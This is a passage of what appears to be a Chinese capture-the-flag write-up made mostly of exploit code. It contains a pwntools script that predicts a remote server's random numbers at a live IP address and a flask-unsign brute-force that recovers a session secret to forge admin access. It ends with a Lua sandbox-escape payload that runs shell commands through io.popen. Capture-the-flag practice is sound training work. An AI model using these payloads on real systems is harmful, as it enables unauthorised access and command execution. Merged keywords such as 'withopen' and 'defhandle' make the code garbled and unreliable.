from PIL import Image from gmpy2 import * import sys from zlib import * sys.set_int_max_str_digits(0) MAX = 500 pic = Image.new("RGB",(MAX,MAX))
withopen"QRcode"as f: str=f.readline()
str=bin(int(str)) print(iroot(len(str),2)) i=0 for y inrange(0,MAX): for x inrange(0,MAX): if(str[i] == '1'): pic.putpixel([x,y],(0,0,0)) else:pic.putpixel([x,y],(255,255,255)) i = i+1 pic.show() pic.save("flag.png") # DUTCTF{3E07747C-E552-EC96-003C-F3DBD9CD6704}
defhandle(self): self.send(b'welcome to this guess game!') self.send(b'please tell me your name:', newline=False) name = self.recv() if bytes_to_long(name).bit_length() <= 32: self.send(b'flag') exit() self.send(b'Let\'s guess!') whileTrue: guess = random.randint(0, bytes_to_long(name)) self.send(b'>', newline=False) ifint(self.recv().decode()) == guess: self.send(flag) else: self.send(b'sorry, but the num is:', newline=False) self.send(str(guess).encode())
io=remote("210.30.97.133",28044) io.recvuntil(b'please tell me your name:') io.sendline(name) for i inrange (312): print("Times: ",i) io.recvuntil(b'>') io.sendline(b'1') io.recvuntil(b'sorry, but the num is:') num = io.recvline() num = int(num) # print(num) predictor.setrandbits(num,64) io.recvuntil(b'>') predict_num=bytes(str(predictor.getrandbits(64)).encode()) # print(predict_num) io.sendline(predict_num) print(io.recvline())
@app.route('/admin') defadmin(): if session.get('user') != "admin": return"you are not admin!go away" else: flag = '' withopen('/flag', 'r') as f: for line in f: flag += line return'Congratulations! You logged in as admin. Here is the flag:{}'.format(flag)
if __name__ == '__main__': app.run(host='0.0.0.0', port=8080)
import string import flask_unsign table = string.ascii_letters + string.digits # s = string.digits # s=["0","1","2","3","4","5","6","7","8","9"] index=[] for s1 in table: for s2 in table: for s3 in table: s=s1+s2+s3 index.append(s)
l=len(index) withopen ("index.txt",mode="w") as f: for i inrange (l): if (i%10000==0): print("times:",i) f.write("\"") f.write(index[i]) f.write("\"\n")
爆破一下secret
1 2 3 4 5
PS C:\> flask-unsign --unsign --cookie 'eyJ1c2VyIjoiMzMyMjMifQ.ZCBOug.JAGEY2qy_y_fzPhWoQWYw95jSf4' --wordlist "index.txt" [*] Session decodes to: {'user': '33223'} [*] Starting brute-forcer with8 threads.. [+] Found secret key after 216448 attempts '4rc'
local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");localio = io_l();local f = io.popen("id", "r");local res = f:read("*a");f:close();return res ---在"id"进行这里恶意代码注入